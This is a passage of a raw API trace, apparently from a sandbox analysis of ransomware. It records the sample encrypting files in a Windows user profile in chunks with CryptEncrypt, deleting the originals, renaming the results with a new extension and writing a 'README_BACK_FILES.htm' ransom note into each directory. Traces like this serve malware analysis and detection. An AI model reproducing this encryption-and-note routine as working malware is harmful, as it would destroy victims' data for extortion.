1 [0266.464] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.464] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.464] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.465] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.465] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.465] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.465] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.465] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.465] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.466] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0266.466] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0266.467] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 1 [0266.467] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0266.467] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x10, lpOverlapped=0x0) returned 1 [0266.467] CloseHandle (hObject=0x5d3c) returned 1 [0266.467] CloseHandle (hObject=0x5d44) returned 1 [0266.467] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms"), bFailIfExists=0) returned 1 [0266.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms", dwFileAttributes=0x2000) returned 1 [0266.471] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms.gsg")) returned 1 [0266.472] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\internet explorer suggested sites~.feed-ms.fuck")) returned 1 [0266.472] CryptDestroyHash (hHash=0x2e7ec80) returned 1 [0266.472] CryptDestroyKey (hKey=0x2e7f440) returned 1 [0266.473] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.473] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.473] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0266.473] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\readme_back_files.htm")) returned 0xffffffff [0266.473] AreFileApisANSI () returned 1 [0266.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0266.473] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.473] GetFileType (hFile=0x5d48) returned 0x1 [0266.474] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.474] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.474] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.475] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\readme_back_files.htm")) returned 0xffffffff [0266.475] AreFileApisANSI () returned 1 [0266.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0266.475] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.476] GetFileType (hFile=0x5d10) returned 0x1 [0266.476] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.477] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.477] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.482] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.483] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.483] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\6YGNCJW8\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0266.483] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.483] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.483] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0266.483] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\6YGNCJW8\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\6ygncjw8\\readme_back_files.htm")) returned 0xffffffff [0266.484] AreFileApisANSI () returned 1 [0266.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0266.484] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\6YGNCJW8\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\6ygncjw8\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.484] GetFileType (hFile=0x5d48) returned 0x1 [0266.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.485] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.485] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.485] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\FZW2QEOY\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0266.485] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.485] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.486] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0266.486] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\FZW2QEOY\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\fzw2qeoy\\readme_back_files.htm")) returned 0xffffffff [0266.486] AreFileApisANSI () returned 1 [0266.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0266.486] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\FZW2QEOY\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\fzw2qeoy\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.486] GetFileType (hFile=0x5d48) returned 0x1 [0266.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.487] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.487] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\O593F7EE\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0266.488] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.488] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.488] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.489] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0266.489] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\O593F7EE\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\o593f7ee\\readme_back_files.htm")) returned 0xffffffff [0266.489] AreFileApisANSI () returned 1 [0266.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0266.489] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\O593F7EE\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\o593f7ee\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.489] GetFileType (hFile=0x5d48) returned 0x1 [0266.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.490] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.490] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\PJ5H3B54\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0266.490] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0266.490] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0266.490] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0266.491] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\PJ5H3B54\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\pj5h3b54\\readme_back_files.htm")) returned 0xffffffff [0266.491] AreFileApisANSI () returned 1 [0266.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0266.491] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\PJ5H3B54\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\pj5h3b54\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0266.492] GetFileType (hFile=0x5d48) returned 0x1 [0266.492] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0266.493] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.493] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.493] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\readme_back_files.htm")) returned 0xffffffff [0266.493] AreFileApisANSI () returned 1 [0266.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0266.493] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\feeds cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.494] GetFileType (hFile=0x5d10) returned 0x1 [0266.494] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.495] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.495] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.495] FindNextFileA (in: hFindFile=0x2e7fbc0, 